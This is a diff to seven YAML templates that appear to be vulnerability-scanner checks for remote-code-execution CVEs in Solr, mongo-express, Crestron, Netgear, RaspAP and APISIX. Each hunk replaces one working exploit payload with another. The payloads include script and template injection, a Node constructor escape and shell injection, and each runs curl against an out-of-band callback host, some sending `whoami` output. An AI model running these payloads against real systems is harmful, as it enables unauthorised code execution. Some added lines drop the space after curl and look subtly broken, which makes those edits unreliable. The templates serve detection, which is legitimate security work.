diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml index 4df541d3a7..360706171e 100644 --- a/cves/2019/CVE-2019-0193.yaml +++ b/cves/2019/CVE-2019-0193.yaml @@ -34,7 +34,7 @@ requests: Content-type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest - command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport + command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport extractors: - type: regex diff --git a/cves/2019/CVE-2019-10758.yaml b/cves/2019/CVE-2019-10758.yaml index 32cbffabb0..0e50aa9b69 100644 --- a/cves/2019/CVE-2019-10758.yaml +++ b/cves/2019/CVE-2019-10758.yaml @@ -26,7 +26,7 @@ requests: Authorization: Basic YWRtaW46cGFzcw== Content-Type: application/x-www-form-urlencoded - document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}") + document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl{{interactsh-url}}") matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction diff --git a/cves/2019/CVE-2019-17558.yaml b/cves/2019/CVE-2019-17558.yaml index 26673df9ee..97a4563023 100644 --- a/cves/2019/CVE-2019-17558.yaml +++ b/cves/2019/CVE-2019-17558.yaml @@ -39,7 +39,7 @@ requests: } - | - GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 + GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1 Host: {{Hostname}} Connection: close diff --git a/cves/2019/CVE-2019-3929.yaml b/cves/2019/CVE-2019-3929.yaml index 2aeb041e0c..213dd63277 100644 --- a/cves/2019/CVE-2019-3929.yaml +++ b/cves/2019/CVE-2019-3929.yaml @@ -22,7 +22,7 @@ requests: path: - "{{BaseURL}}/cgi-bin/file_transfer.cgi" - body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27" + body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27" headers: Content-Type: application/x-www-form-urlencoded diff --git a/cves/2021/CVE-2021-20167.yaml b/cves/2021/CVE-2021-20167.yaml index ab50335740..bf2fc021a8 100644 --- a/cves/2021/CVE-2021-20167.yaml +++ b/cves/2021/CVE-2021-20167.yaml @@ -23,7 +23,7 @@ requests: POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1 Host: {{Hostname}} - "name":"';$(curl http://{{interactsh-url}});'", + "name":"';$(curl {{interactsh-url}});'", "email":"a@b.c" matchers: diff --git a/cves/2021/CVE-2021-33357.yaml b/cves/2021/CVE-2021-33357.yaml index cb52ddd4ea..352972c349 100644 --- a/cves/2021/CVE-2021-33357.yaml +++ b/cves/2021/CVE-2021-33357.yaml @@ -21,7 +21,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20http://{{interactsh-url}}/`whoami`;" + - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20{{interactsh-url}}/`whoami`;" matchers-condition: and matchers: diff --git a/cves/2022/CVE-2022-24112.yaml b/cves/2022/CVE-2022-24112.yaml index 119a801f06..3b2bcb4e90 100644 --- a/cves/2022/CVE-2022-24112.yaml +++ b/cves/2022/CVE-2022-24112.yaml @@ -41,7 +41,7 @@ requests: { "method":"PUT", "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1", - "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://{{interactsh-url}}/`whoami`'); return true end\"}" + "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl{{interactsh-url}}/`whoami`'); return true end\"}" } ] }